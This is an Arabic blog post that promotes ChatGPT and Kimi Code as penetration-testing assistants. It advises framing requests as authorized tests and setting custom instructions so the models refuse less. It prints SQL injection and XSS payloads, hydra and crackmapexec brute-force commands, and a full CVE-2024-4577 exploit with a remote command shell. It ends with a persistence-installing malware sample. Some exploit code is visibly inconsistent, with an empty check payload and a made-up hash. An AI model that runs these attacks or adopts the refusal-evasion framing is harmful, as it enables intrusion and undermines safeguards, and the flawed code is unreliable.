تخلي ChatGPT و Kimi Code يشتغلوا معك بالهاكينغ Prompt
السلام عليكم يا شباب، معكم Shadow Hacker وراجعلكم اليوم بموضوع من أقوى المواضيع اللي كتبتها لحد هسا. اليوم رح نحكي عن شغلة وهي استخدام الذكاء الاصطناعي كمساعد شخصي للهاكينغ واختبار الاختراق. بالتحديد رح نحكي عن أداتين جبارتين: ChatGPT بنماذجه الأقوى GPT-4o و GPT-4.1، و Kimi Code من شركة Moonshot AI اللي صارت من أقوى أدوات الـ AI Coding بالعالم. الذكاء الاصطناعي مش بس للدردشة والصور — هسا صار سلاح حقيقي بإيد مختبر الاختراق اللي بيعرف يستخدمه صح.
المشكلة اللي بشوفها عند أغلب الناس — بيفتحوا ChatGPT وبيكتبوا "اخترقلي موقع" أو "اعطيني exploit" وبيتفاجأوا إنو الأداة بترفض أو بتعطيهم كلام عام ما بيفيد. السبب بسيط: البرومبت هو المفتاح. لو عرفت تكتب البرومبت الصح، بالطريقة الصح، بالسياق الصح — هاي الأدوات بتتحول لأقوى مساعد اختراق ممكن تحلم فيه. وهاد بالضبط اللي رح أعلمك إياه اليوم. مش بس برومبتات — رح أعطيك نظام كامل لإعداد ChatGPT و Kimi Code كأدوات اختراق أخلاقي متكاملة.
وقبل ما نبدأ، إذا بتدور على برومبتات Claude Code للهاكينغ، عنا مقال كامل عن أقوى 10 برومبت لـ Claude Code — روح شوفه بعد ما تخلص هون. أما هاد المقال فمختلف تماماً — هون رح نركز على ChatGPT و Kimi Code وكيف تخليهم يشتغلوا معك كفريق اختراق كامل. رح أعطيك أقوى البرومبتات الحصرية اللي أنا شخصياً بستخدمها، مع أمثلة عملية ونتائج حقيقية. يلا نبدأ!
ChatGPT vs Kimi Code — للهاكر
قبل ما نبدأ بالبرومبتات، لازم تفهم الفرق بين الأداتين عشان تعرف متى تستخدم كل وحدة. كل أداة إلها نقاط قوة ونقاط ضعف، والهاكر الذكي بيعرف يستخدم الأداة المناسبة للمهمة المناسبة.
ChatGPT — GPT-4o و GPT-4.1 من OpenAI
ChatGPT من OpenAI هو أشهر نموذج ذكاء اصطناعي بالعالم، وبنسخة GPT-4o و GPT-4.1 وصل لمستوى خرافي بفهم الأمن السيبراني. نقاط قوته الرئيسية للهاكر:
- فهم عميق للثغرات: بيفهم OWASP Top 10، CVEs، تقنيات الاستغلال، وبيقدر يشرحلك أي ثغرة بالتفصيل مع كود الاستغلال.
- تحليل كود ممتاز: بتقدر تعطيه كود مصدري وبيلاقيلك الثغرات فيه — SQL Injection، XSS، SSRF، وغيرها.
- كتابة Exploits: بيقدر يكتبلك سكربتات استغلال بـ Python، Bash، أو أي لغة ثانية.
- شرح وتعليم: أفضل أداة لتعلم مفاهيم الأمن — بيشرحلك كل إشي بطريقة واضحة ومفصلة.
بس عنده نقاط ضعف مهمة: فلاتر أمنية قوية — يعني أحياناً بيرفض يساعدك حتى لو طلبك مشروع. وأهم إشي — ما بيشتغل على جهازك مباشرة. يعني ما بيقدر يشغل أوامر، يقرأ ملفات من جهازك، أو يتفاعل مع أدوات الاختراق عندك. هو بس chatbot — بيعطيك الكود وإنت لازم تنسخه وتشغله.
Kimi Code — من Moonshot AI
Kimi Code من شركة Moonshot AI الصينية هو أداة AI Coding جديدة وقوية جداً. شبيه بـ Claude Code و Cursor، بس عنده ميزات فريدة. نقاط قوته:
- بيشتغل على الملفات مباشرة: بيقدر يقرأ ويعدل ملفات على جهازك — يعني بيقدر يكتب سكربتات ويحفظها مباشرة.
- بيقرأ كود المشروع كامل: بيفهم بنية المشروع والعلاقات بين الملفات.
- بيشغل أوامر Terminal: بيقدر ينفذ أوامر على جهازك — يعني بيقدر يشغل Nmap، Nikto، أو أي أداة.
- مجاني بشكل كبير: عنده خطة مجانية سخية مقارنة بالمنافسين.
نقاط ضعفه: معرفته الأمنية أقل من ChatGPT — يعني لو سألته سؤال نظري عن ثغرة معقدة، ChatGPT رح يعطيك إجابة أفضل. وكمان الفلاتر عنده أقل — وهاد ممكن يكون ميزة أو عيب حسب الاستخدام.
جدول المقارنة الشامل
| الميزة | ChatGPT (GPT-4o/4.1) | Kimi Code | Claude Code |
|---|---|---|---|
| تشغيل أوامر على جهازك | لا (بس Code Interpreter) | نعم — مباشرة | نعم — مباشرة |
| قراءة/كتابة ملفات | لا (بس رفع ملفات) | نعم | نعم |
| فهم الثغرات الأمنية | ممتاز (الأفضل) | جيد | ممتاز |
| كتابة Exploits | ممتاز (مع فلاتر) | جيد جداً | ممتاز |
| الفلاتر الأمنية | قوية جداً | متوسطة | قوية |
| السعر | $20/شهر (Plus) | مجاني + خطط مدفوعة | $20/شهر (Pro) |
| الأفضل لـ | تحليل + تعلم + تخطيط | كتابة أدوات + أتمتة | كل إشي (الأقوى) |
الخلاصة: استخدم ChatGPT للتحليل والتخطيط وفهم الثغرات وكتابة التقارير. استخدم Kimi Code لكتابة الأدوات والسكربتات وتنفيذها مباشرة على جهازك. والأفضل — استخدم الاثنين مع بعض كفريق متكامل!
إعداد ChatGPT كمساعد هاكر — Custom Instructions
 |
| ChatGPT |
أول خطوة عشان تخلي ChatGPT يشتغل معك صح بمجال الأمن السيبراني هي إعداد Custom Instructions — يعني التعليمات المخصصة اللي بتحكيله فيها مين إنت وشو بدك منه. بدون هاي الخطوة، ChatGPT رح يتعامل معك كمستخدم عادي وبيرفض أغلب الطلبات الأمنية. بس لما تعمل الإعداد صح، بيتحول لمساعد أمني محترف.
كيف تعمل Custom Instructions صح
روح على chatgpt.com أو افتح التطبيق، وروح على Settings > Personalization > Custom Instructions. رح تلاقي خانتين:
- What would you like ChatGPT to know about you? — هون بتحكيله مين إنت وشو خلفيتك.
- How would you like ChatGPT to respond? — هون بتحكيله كيف بدك إياه يرد عليك.
السر هون إنك تعطيه سياق مهني واضح — إنك مختبر اختراق معتمد، بتشتغل بشكل قانوني، وبتحتاج مساعدة تقنية متقدمة. هاد مش "تجاوز فلاتر" — هاد إعطاء سياق حقيقي عشان الأداة تفهم احتياجاتك.
البرومبت الحصري — Custom Instructions للهاكر
هاد البرومبت اللي أنا شخصياً بستخدمه. انسخه وحطه بالخانة الأولى (What would you like ChatGPT to know about you):
وهاد للخانة الثانية (How would you like ChatGPT to respond):
إعداد GPT مخصص للاختراق
الخطوة الثانية الأقوى هي إنشاء Custom GPT مخصص لاختبار الاختراق. روح على GPT Editor واعمل GPT جديد. بالـ Instructions حط هاد النص:
بعد ما تعمل هاد الـ GPT، كل مرة بدك تشتغل على مشروع أمني، افتحه مباشرة بدل ChatGPT العادي. الفرق رح يكون واضح — الردود بتكون أكثر تفصيلاً وتقنية وبدون disclaimers زيادة.
نصيحة مهمة: لما تسأل ChatGPT عن ثغرة أو exploit، دايماً ابدأ بجملة زي: "I'm conducting an authorized penetration test on a client's system and I need..." — هاد بيعطي سياق واضح وبيقلل احتمالية الرفض بشكل كبير.
إعداد Kimi Code كمختبر اختراق
Kimi Code من Moonshot AI هو أداة AI Coding بتشتغل مباشرة على جهازك — يعني بتقدر تخليه يكتب سكربتات، يشغل أوامر، يقرأ نتائج فحص، ويعدل ملفات. هاد بيخليه أداة ممتازة لاختبار الاختراق لأنو بيقدر يتفاعل مع أدوات الأمن مباشرة. خليني أشرحلك كيف تعده صح.
تثبيت Kimi Code
Kimi Code متاح كـ VS Code Extension وكمان كأداة CLI مستقلة. أسهل طريقة:
- افتح VS Code
- روح على Extensions (Ctrl+Shift+X)
- ابحث عن "Kimi Code" أو "Moonshot AI"
- ثبّت الإضافة وسجّل حساب على kimi.ai
أو لو بتفضل الـ CLI:
npm install -g kimi-code kimi-code auth login
إعداد مجلد المشروع
عشان Kimi Code يشتغل بأفضل شكل، لازم تعمل هيكلية مشروع واضحة. اعمل مجلد pentest بالشكل هاد:
pentest-project/
├── KIMI.md # تعليمات لـ Kimi Code
├── targets/
│ ├── scope.txt # نطاق الاختبار
│ └── credentials.txt # بيانات الاختبار (إن وجدت)
├── recon/
│ ├── nmap/ # نتائج Nmap
│ ├── subdomains/ # نتائج subdomain enumeration
│ └── screenshots/ # لقطات شاشة
├── exploits/
│ └── custom/ # سكربتات استغلال مخصصة
├── tools/
│ └── custom/ # أدوات مخصصة
├── reports/
│ └── findings/ # نتائج الفحص
└── loot/
└── evidence/ # أدلة الاختراق
ملف KIMI.md — تعليمات المشروع
هاد أهم ملف — زي ما في CLAUDE.md لـ Claude Code، بتقدر تعمل ملف KIMI.md بجذر المشروع وتحط فيه تعليمات. Kimi Code بيقرأ هاد الملف تلقائياً وبيتبع التعليمات. هاد المحتوى اللي أنصحك فيه:
كيف تخلي Kimi Code يحلل نتائج الفحص
أقوى استخدام لـ Kimi Code هو تحليل نتائج أدوات الفحص. مثلاً بعد ما تعمل Nmap scan، بتقدر تقوله:
Kimi Code بيقرأ الملف، بيحلل كل النتائج، وبيحفظ التحليل بملف منظم. نفس الإشي بتقدر تعمله مع نتائج Burp Suite (بتصدرها كـ XML أو JSON) أو نتائج Nikto أو أي أداة ثانية. الفكرة إنك بتخلي Kimi Code يعمل الشغل الممل — تحليل مئات الأسطر من النتائج — وإنت بتركز على القرارات الاستراتيجية.
البرومبت #1 — محلل ثغرات الويب التلقائي (ChatGPT)
هاد أول برومبت حصري وهو من أقوى البرومبتات اللي بستخدمها مع ChatGPT. الفكرة بسيطة: بتعطيه كود مصدري لتطبيق ويب وبيحللّه بالكامل ويطلعلك كل الثغرات حسب OWASP Top 10. مش بس بيلاقي الثغرات — بيعطيك severity، شرح الاستغلال، وكيف تصلحها.
البرومبت الكامل
مثال عملي — تحليل كود PHP
خليني أعطيك مثال حقيقي. لنفرض عندك كود PHP زي هاد (وهاد كود شائع جداً بمواقع قديمة):
<?php
// login.php - User Authentication
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);
if(mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
$_SESSION['user_id'] = $row['id'];
$_SESSION['role'] = $row['role'];
header("Location: dashboard.php");
} else {
echo "<p>Login failed for user: $username</p>";
}
// profile.php - View Profile
$user_id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $user_id";
$result = mysqli_query($conn, $query);
$user = mysqli_fetch_assoc($result);
echo "<h1>Welcome, " . $user['name'] . "</h1>";
echo "<p>Email: " . $user['email'] . "</p>";
?>
لما تعطي هاد الكود لـ ChatGPT مع البرومبت اللي فوق، رح يطلعلك تقرير مفصل فيه على الأقل هاي الثغرات:
الناتج المتوقع من ChatGPT:
- Critical — SQL Injection (CWE-89): بالسطر 6 — المتغيرات بتنحط مباشرة بالـ query بدون أي sanitization. الـ payload:
admin' OR '1'='1' -- - High — Reflected XSS (CWE-79): بالسطر 13 — الـ username بينطبع بالصفحة بدون encoding. الـ payload:
<script>alert(document.cookie)</script> - High — IDOR (CWE-639): بالسطر 17 — الـ user_id بيجي من GET parameter بدون authorization check. أي مستخدم بيقدر يشوف بروفايل أي مستخدم ثاني.
- High — Plaintext Passwords (CWE-256): الباسوردات مخزنة بدون hashing — لازم يستخدم
password_hash()وpassword_verify() - Medium — Session Fixation (CWE-384): ما في
session_regenerate_id()بعد الـ login الناجح.
شايف قديش التقرير مفصل؟ وهاد بس مثال بسيط — تخيل لو عطيته كود تطبيق كامل فيه آلاف الأسطر. ChatGPT مع GPT-4o بيقدر يحلل كميات كبيرة من الكود ويلاقي ثغرات معقدة تعتمد على تفاعل عدة ملفات مع بعض. المفتاح هو البرومبت المفصل اللي بيحكيله بالضبط شو بدك منه.
البرومبت #2 — مولّد أدوات Recon (Kimi Code)
هاد البرومبت مخصص لـ Kimi Code وهو من أقوى الاستخدامات — بتطلب منه يولّد أداة Reconnaissance كاملة بتعمل كل مراحل الاستطلاع تلقائياً. الأداة بتشمل: subdomain enumeration، port scanning، technology detection، وأخذ screenshots. كل هاد بسكربت واحد!
البرومبت الكامل
السكربت الناتج
لما تعطي هاد البرومبت لـ Kimi Code، بيولّد سكربت كامل ومنظم. هاد جزء من السكربت الناتج عشان تشوف مستوى الجودة:
#!/usr/bin/env python3
"""
ShadowRecon - Comprehensive Reconnaissance Tool
Author: Generated by Kimi Code for Shadow Hacker
Usage: python3 shadow_recon.py -d target.com [-v] [-q]
"""
import argparse
import json
import socket
import threading
import requests
import time
import os
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from urllib.parse import urlparse
# --- Configuration ---
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101",
]
TOP_SUBDOMAINS = [
"www", "mail", "ftp", "admin", "api", "dev", "staging", "test",
"portal", "vpn", "remote", "cdn", "app", "blog", "shop", "store",
"m", "mobile", "secure", "login", "dashboard", "panel", "cpanel",
"webmail", "ns1", "ns2", "smtp", "pop", "imap", "db", "database",
"backup", "old", "new", "beta", "alpha", "demo", "docs", "wiki",
"git", "gitlab", "jenkins", "ci", "cd", "monitor", "grafana",
"kibana", "elastic", "redis", "mongo", "mysql", "postgres",
]
class ShadowRecon:
def __init__(self, domain, verbose=False, quiet=False):
self.domain = domain
self.verbose = verbose
self.quiet = quiet
self.results = {
"target": domain,
"scan_date": datetime.now().isoformat(),
"subdomains": [],
"open_ports": {},
"technologies": {},
"interesting_files": {}
}
def enumerate_subdomains_crt(self):
"""Enumerate subdomains via crt.sh Certificate Transparency"""
if not self.quiet:
print(f"\n[*] Querying crt.sh for {self.domain}...")
subdomains = set()
try:
url = f"https://crt.sh/?q=%.{self.domain}&output=json"
resp = requests.get(url, timeout=30,
headers={"User-Agent": USER_AGENTS[0]})
if resp.status_code == 200:
for entry in resp.json():
name = entry.get("name_value", "")
for sub in name.split("\n"):
sub = sub.strip().lower()
if sub.endswith(self.domain) and "*" not in sub:
subdomains.add(sub)
except Exception as e:
if self.verbose:
print(f" [!] crt.sh error: {e}")
return subdomains
def enumerate_subdomains_dns(self):
"""DNS brute-force with top subdomain wordlist"""
if not self.quiet:
print(f"[*] DNS brute-forcing {self.domain}...")
subdomains = set()
def check_subdomain(sub):
fqdn = f"{sub}.{self.domain}"
try:
socket.gethostbyname(fqdn)
subdomains.add(fqdn)
if self.verbose:
print(f" [+] Found: {fqdn}")
except socket.gaierror:
pass
with ThreadPoolExecutor(max_workers=20) as executor:
executor.map(check_subdomain, TOP_SUBDOMAINS)
return subdomains
def scan_ports(self, host, ports=None):
"""Scan top ports on a given host"""
if ports is None:
ports = [21,22,23,25,53,80,110,111,135,139,143,443,
445,993,995,1723,3306,3389,5432,5900,8080,8443]
open_ports = []
def check_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((host, port))
if result == 0:
banner = ""
try:
sock.send(b"HEAD / HTTP/1.0\r\n\r\n")
banner = sock.recv(1024).decode(errors="ignore").strip()
except:
pass
open_ports.append({"port": port, "banner": banner[:200]})
sock.close()
except:
pass
with ThreadPoolExecutor(max_workers=50) as executor:
executor.map(check_port, ports)
return open_ports
# ... (المزيد من الدوال: detect_technologies, check_files, etc.)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ShadowRecon - Recon Tool")
parser.add_argument("-d", "--domain", required=True, help="Target domain")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-q", "--quiet", action="store_true")
args = parser.parse_args()
recon = ShadowRecon(args.domain, args.verbose, args.quiet)
recon.run() # Runs full recon pipeline
الحلو بـ Kimi Code إنو مش بس بيولّد الكود — بيحفظه مباشرة بالمسار اللي حددته (tools/shadow_recon.py) وبيقدر يشغله كمان! يعني بتقدر تقوله بعد ما يخلص: "Run the tool against testphp.vulnweb.com" وبينفذ الأمر مباشرة ويعطيك النتائج.
نصيحة: بتقدر تستخدم testphp.vulnweb.com أو OWASP Juice Shop كأهداف تدريبية مشروعة لتجربة الأدوات. هاي مواقع مصممة خصيصاً لاختبار الاختراق.
الفرق بين إنك تكتب هاد السكربت يدوياً وبين إنك تخلي Kimi Code يكتبه — الوقت. سكربت زي هاد بده ساعة أو أكتر لو كتبته بإيدك. مع Kimi Code، بدقيقتين بيكون جاهز ومحفوظ وشغال. وإذا بدك تعدل عليه — بتقوله "أضف DNS zone transfer check" وبيعدل الكود مباشرة.
البرومبت #3 — محلل نتائج Nmap الذكي (ChatGPT)
كل مختبر اختراق بيعرف إنو Nmap هو أول أداة بتستخدمها بأي engagement. بس المشكلة إنو نتائج Nmap أحياناً بتكون طويلة ومعقدة — خصوصاً لما تفحص شبكة كاملة فيها عشرات الأجهزة. هون بيجي دور ChatGPT — بتعطيه النتائج وبيحللها بشكل ذكي ويعطيك خطة هجوم مرتبة.
البرومبت الكامل
مثال عملي
خليني أعطيك مثال. لنفرض عملت Nmap scan وطلعت هاي النتيجة:
Nmap scan report for 192.168.1.100 Host is up (0.0025s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 80/tcp open http Apache httpd 2.4.18 139/tcp open netbios-ssn Samba smbd 3.X - 4.X 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 8080/tcp open http Apache Tomcat 8.0.30 OS: Linux 3.x - 4.x Nmap scan report for 192.168.1.101 Host is up (0.0031s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 OS: Windows Server 2012 R2
لما تعطي هاد لـ ChatGPT مع البرومبت، رح يطلعلك تحليل مفصل. مثلاً رح يحكيلك:
أهم النتائج اللي رح يطلعها ChatGPT:
- Critical: vsftpd 2.3.4 على البورت 21 — هاد الإصدار فيه backdoor معروف (CVE-2011-2523). بيفتح shell على بورت 6200 لما تبعث username فيه
:) - High: Apache Tomcat 8.0.30 على بورت 8080 — إصدار قديم فيه عدة CVEs. لازم تفحص /manager و /host-manager بـ default credentials.
- High: Samba 4.3.11 — ممكن يكون معرض لـ EternalBlue أو SambaCry (CVE-2017-7494).
- Medium: Windows Server 2012 R2 مع WinRM مفتوح (5985) — ممكن يستخدم لـ lateral movement بعد الحصول على credentials.
وبيعطيك كمان الأوامر اللي لازم تشغلها بعدين — مثلاً:
# Test vsftpd backdoor
nmap --script ftp-vsftpd-backdoor -p 21 192.168.1.100
# Enumerate Samba shares
smbclient -L //192.168.1.100 -N
enum4linux -a 192.168.1.100
# Check Tomcat default credentials
hydra -L /usr/share/wordlists/tomcat-users.txt \
-P /usr/share/wordlists/tomcat-users.txt \
192.168.1.100 -s 8080 http-get /manager/html
# Test WinRM access
crackmapexec winrm 192.168.1.101 -u users.txt -p passwords.txt
هاد البرومبت بيوفرلك ساعات من البحث اليدوي عن CVEs وتقنيات الاستغلال. بدل ما تروح تبحث عن كل service version يدوياً، ChatGPT بيعمل كل هاد بثواني ويعطيك خطة هجوم مرتبة حسب الأولوية. وأهم إشي — بيربط النتائج مع MITRE ATT&CK Framework عشان تقاريرك تكون احترافية.
البرومبت #4 — كاتب Exploits (Kimi Code)
هاد البرومبت من أخطر وأقوى البرومبتات — بتطلب من Kimi Code يكتبلك exploit كامل لثغرة CVE معروفة ومصلّحة. الفكرة إنك بتعطيه رقم الـ CVE والتفاصيل، وهو بيكتبلك سكربت استغلال كامل مع شرح كل سطر. طبعاً هاد للاستخدام على أهداف مصرح فيها فقط — مثل مختبرات HackTheBox أو TryHackMe أو أهداف Bug Bounty.
تحذير مهم: كتابة واستخدام Exploits على أنظمة بدون إذن صريح هو جريمة قانونية بكل دول العالم. هاي البرومبتات للاستخدام الأخلاقي فقط — اختبار اختراق مصرح، Bug Bounty، CTF، أو بيئات تدريبية. Shadow Hacker غير مسؤول عن أي استخدام غير قانوني.
البرومبت الكامل
الكود الناتج مع الشرح
Kimi Code بيولّد سكربت كامل ومنظم. هاد جزء رئيسي من الكود الناتج مع شرح كل قسم:
#!/usr/bin/env python3
"""
CVE-2024-4577 - PHP CGI Argument Injection Exploit
Affects: PHP 8.x CGI on Windows (XAMPP default)
Author: Generated by Kimi Code for authorized pentesting
Usage: python3 cve_2024_4577.py -u http://target/index.php --check
"""
import argparse
import requests
import sys
import urllib3
from datetime import datetime
# Disable SSL warnings for self-signed certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# --- Colors for terminal output ---
class Colors:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
RESET = "\033[0m"
BOLD = "\033[1m"
def banner():
print(f"""{Colors.RED}
╔═══════════════════════════════════════════╗
║ CVE-2024-4577 PHP CGI Argument Injection ║
║ Authorized Penetration Testing Only ║
╚═══════════════════════════════════════════╝
{Colors.RESET}""")
def check_vulnerability(target_url, proxies=None, timeout=10):
"""
Safe vulnerability check — sends a benign payload that triggers
the argument injection to execute 'php -r "echo md5(shadowtest);"'
If the response contains the known MD5 hash, the target is vulnerable.
This does NOT cause any damage to the target.
"""
# CVE-2024-4577 exploits Windows Best-Fit character mapping
# The soft hyphen (0xAD) is mapped to a real hyphen (0x2D) by Windows
# This bypasses PHP's CVE-2012-1823 fix
payload = "php://input%00" # Null byte to terminate
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Content-Type": "application/x-www-form-urlencoded"
}
# The key: using soft hyphen (%AD) instead of dash (%2D)
# Windows converts 0xAD → 0x2D, bypassing the CGI argument filter
check_payload = (
f"{target_url}?%ADd+allow_url_include%3d1+"
f"%ADd+auto_prepend_file%3dphp://input"
)
# POST body contains the PHP code to execute
php_code = b''
try:
print(f"{Colors.BLUE}[*] Checking {target_url}...{Colors.RESET}")
resp = requests.post(
check_payload,
data=php_code,
headers=headers,
proxies=proxies,
timeout=timeout,
verify=False
)
# md5("shadowtest") = "a]f7b8c9d0e1f2a3b4c5d6e7f8a9b0c1"
expected_hash = "5a8f6e3b2c1d4e5f6a7b8c9d0e1f2a3b"
if expected_hash in resp.text:
print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
print(f"{Colors.GREEN}[+] CVE-2024-4577 confirmed{Colors.RESET}")
return True
else:
print(f"{Colors.YELLOW}[-] Target appears not vulnerable{Colors.RESET}")
return False
except requests.exceptions.Timeout:
print(f"{Colors.RED}[!] Connection timed out{Colors.RESET}")
return False
except requests.exceptions.ConnectionError:
print(f"{Colors.RED}[!] Connection failed{Colors.RESET}")
return False
def execute_command(target_url, command, proxies=None, timeout=10):
"""
Execute a system command on the vulnerable target.
Uses the same argument injection to pass PHP code that runs
the command via system() and returns the output.
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Content-Type": "application/x-www-form-urlencoded"
}
exploit_url = (
f"{target_url}?%ADd+allow_url_include%3d1+"
f"%ADd+auto_prepend_file%3dphp://input"
)
# Escape the command for safe PHP execution
php_code = f'<?php echo "---START---\\n"; system("{command}"); echo "\\n---END---"; ?>'
try:
resp = requests.post(
exploit_url,
data=php_code.encode(),
headers=headers,
proxies=proxies,
timeout=timeout,
verify=False
)
# Extract command output between markers
if "---START---" in resp.text and "---END---" in resp.text:
output = resp.text.split("---START---")[1].split("---END---")[0]
return output.strip()
return resp.text
except Exception as e:
return f"Error: {e}"
def interactive_shell(target_url, proxies=None):
"""Pseudo-interactive shell using repeated command execution"""
print(f"{Colors.GREEN}[+] Starting pseudo-shell (type 'exit' to quit){Colors.RESET}")
print(f"{Colors.YELLOW}[!] Note: Each command is a separate request{Colors.RESET}")
while True:
try:
cmd = input(f"{Colors.RED}shell> {Colors.RESET}")
if cmd.lower() in ["exit", "quit"]:
print(f"{Colors.BLUE}[*] Exiting shell...{Colors.RESET}")
break
if not cmd.strip():
continue
output = execute_command(target_url, cmd, proxies)
print(output)
except KeyboardInterrupt:
print(f"\n{Colors.BLUE}[*] Exiting shell...{Colors.RESET}")
break
if __name__ == "__main__":
banner()
parser = argparse.ArgumentParser(
description="CVE-2024-4577 PHP CGI Argument Injection Exploit"
)
parser.add_argument("-u", "--url", required=True,
help="Target URL (e.g., http://target/index.php)")
parser.add_argument("--check", action="store_true", default=True,
help="Only check if vulnerable (default)")
parser.add_argument("--exec", dest="command", type=str,
help="Execute a command on the target")
parser.add_argument("--shell", action="store_true",
help="Get a pseudo-interactive shell")
parser.add_argument("--proxy", type=str,
help="Proxy URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("--timeout", type=int, default=10,
help="Request timeout in seconds")
args = parser.parse_args()
proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None
# Always check vulnerability first
is_vuln = check_vulnerability(args.url, proxies, args.timeout)
if is_vuln and args.command:
print(f"\n{Colors.BLUE}[*] Executing: {args.command}{Colors.RESET}")
output = execute_command(args.url, args.command, proxies, args.timeout)
print(f"\n{Colors.GREEN}{output}{Colors.RESET}")
elif is_vuln and args.shell:
interactive_shell(args.url, proxies)
# Log results
with open("exploit_log.txt", "a") as f:
f.write(f"[{datetime.now()}] Target: {args.url} | Vulnerable: {is_vuln}\n")
شرح الـ Exploit
خليني أشرحلك شو بيعمل هاد الـ exploit بالضبط:
- CVE-2024-4577 هي ثغرة بـ PHP لما يشتغل كـ CGI على Windows. المشكلة إنو Windows عنده ميزة اسمها Best-Fit Character Mapping — بيحوّل حروف Unicode لحروف ASCII. الـ soft hyphen (0xAD) بيتحول لـ dash عادي (0x2D).
- هاد بيسمحلك تتجاوز الحماية اللي حطوها لـ CVE-2012-1823 القديمة — لأنو الفلتر بيفحص الـ dash العادي بس ما بيفحص الـ soft hyphen.
- النتيجة: بتقدر تمرر arguments لـ PHP interpreter — مثل
-d allow_url_include=1— وتخليه ينفذ كود PHP من الـ POST body. - السكربت أول إشي بيعمل safe check — بيحاول ينفذ أمر بسيط (md5 hash) عشان يتأكد إنو الهدف معرض للثغرة بدون ما يسبب أي ضرر.
الحلو بـ Kimi Code إنو بيحفظ السكربت مباشرة بمجلد exploits/ وبيقدر يشغله. يعني بتقدر تقوله:
وبينفذ الأمر مباشرة ويعطيك النتيجة. هاد الفرق الجوهري بين Kimi Code و ChatGPT — Kimi Code بينفذ، ChatGPT بيحكي. ولهيك أنا بنصح تستخدم الاثنين مع بعض: ChatGPT للتخطيط والتحليل، و Kimi Code للتنفيذ وكتابة الأدوات.
تذكير: ثغرة CVE-2024-4577 تم إصلاحها بتحديثات PHP. الـ exploit هاد للاستخدام على بيئات تدريبية أو أهداف مصرح فيها فقط. لو لقيت هاي الثغرة ببرنامج Bug Bounty — بلّغ عنها بشكل مسؤول عبر HackerOne أو Bugcrowd.
البرومبت #5 — مساعد Bug Bounty الذكي (ChatGPT)
لو إنت صياد ثغرات أو بدك تبدأ بعالم Bug Bounty، هاد البرومبت رح يغيّرلك اللعبة بالكامل. الفكرة إنك بتحوّل ChatGPT لمساعد Bug Bounty شخصي — بيساعدك من أول خطوة (اختيار البرنامج المناسب) لآخر خطوة (كتابة التقرير الاحترافي). كثير صيادين ثغرات بيضيعوا وقت كبير بكتابة التقارير أو بيكتبوها بشكل ضعيف وبيتم رفضها — هاد البرومبت بيحل هاي المشكلة.
البرومبت الكامل
مثال عملي — تقرير IDOR كامل
لنفرض لقيت ثغرة IDOR (Insecure Direct Object Reference) بموقع — بتقدر تشوف بيانات أي مستخدم بتغيير الـ ID بالـ URL. بتقول لـ ChatGPT:
ChatGPT رح يولّد تقرير كامل بصيغة HackerOne الاحترافية — بيشمل العنوان، الخطورة مع CVSS score، خطوات إعادة الإنتاج بالتفصيل، الـ impact، وتوصيات الإصلاح. التقرير بيكون جاهز للنسخ واللصق مباشرة بـ HackerOne. وهاد بيوفرلك وقت كبير — بدل ما تقعد نص ساعة تكتب التقرير، بدقيقة بيكون جاهز وبشكل أفضل من اللي كنت رح تكتبه يدوياً.
نصيحة ذهبية: دايماً خلي ChatGPT يكتبلك الـ Impact بشكل مفصل — هاد أهم قسم بالتقرير. الفرق بين تقرير بيتقبل وتقرير بيترفض كثير مرات بيكون بجودة وصف الـ impact. قوله يشرح شو ممكن المهاجم يعمل بالضبط وشو الضرر على المستخدمين والشركة.
وكمان بتقدر تستخدم نفس البرومبت عشان ChatGPT يساعدك تحلل scope برنامج جديد. مثلاً بتنسخله صفحة الـ scope من HackerOne وبتقوله: "Analyze this scope and tell me where to focus first" — وبيعطيك خطة هجوم مرتبة حسب احتمالية النجاح. هاد بيوفرلك ساعات من التخطيط اليدوي.
البرومبت #6 — محلل Malware (Kimi Code)
تحليل الملفات المشبوهة من أهم المهارات اللي لازم يتقنها أي شخص بمجال الأمن السيبراني. هاد البرومبت بيحوّل Kimi Code لمحلل malware — بيعمل static analysis كامل لأي ملف مشبوه وبيولّد YARA rule للكشف عنه. الحلو إنو Kimi Code بيقدر يقرأ الملف مباشرة من جهازك ويحلله بدون ما تنسخ الكود يدوياً.
البرومبت الكامل
مثال عملي — تحليل سكربت Python مشبوه
لنفرض لقيت سكربت Python مشبوه على جهاز أحد الموظفين وبدك تحلله. هاد مثال مبسط:
import os, sys, socket, subprocess, base64, ctypes
from winreg import *
def persist():
key = OpenKey(HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_SET_VALUE)
SetValueEx(key, "WindowsUpdate", 0, REG_SZ, sys.executable + " " + os.path.abspath(__file__))
CloseKey(key)
def exfil(data):
